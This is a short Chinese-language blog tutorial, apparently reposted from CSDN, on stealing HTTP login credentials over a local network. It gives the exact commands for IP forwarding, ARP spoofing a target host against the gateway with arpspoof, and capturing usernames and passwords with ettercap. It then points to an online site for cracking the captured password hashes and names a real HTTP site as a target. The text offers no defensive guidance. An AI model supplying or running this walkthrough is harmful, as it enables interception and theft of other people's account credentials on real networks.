嗅探HTTP网页用户账户密码

嗅探HTTP网页

一:测试基础

1.ARP基础:使用mac地址和ip地址进行通信的局域网协议
2.HTTP:一种上网、网页请求通信协议。该协议以明文传输,即在传输时不对数据进行加密,因为http的不安全性,所以在局域网环境中,可以通过ARP欺骗,将目标主机的网络数据包都流经攻击者,然后再通过嗅探的方式从而获取到HTTP的一些数据信息
3.Ettercap:一个kali自带的中间人套件

二.实战测试

1.路由转发,确保目标主机正常上网(截获到的流量发送出去)

echo 1 > /proc/sys/net/ipv4/ip_forward

提示权限不够时输入

echo 1 | sudo tee /proc/sys/net/ipv4/ip_forward

在这里插入图片描述

2.ARP欺骗(欺骗目标,我就是网关)

arpspoof -i eth0 -t 192.168.1.183(目标靶机) 192.168.1.1(网关)

在这里插入图片描述

3.嗅探http登录密码

ettercap -Tq -i eth0

在这里插入图片描述

:T代表文本形式输出,q代表安静模式,i指定网口

开始嗅探,然后静静地等待目标靶机上网,就能获取目标在网页中输入的用户名和密码了

4.目标靶机上网并登录
在这里插入图片描述

5.嗅探到账号,密码,访问的网站
在这里插入图片描述
6.此时密码是加密的,到www.cmd5.com去解密(直接输入密文就自动解密了)

提示:这里仅仅获取http类型的用户登录密码,而现在主流是https协议,下一篇博文破解https,其实还有很多网站都是http的(比如www.4399.com)

猜你喜欢

转载自blog.csdn.net/weixin_45511599/article/details/109053891
今日推荐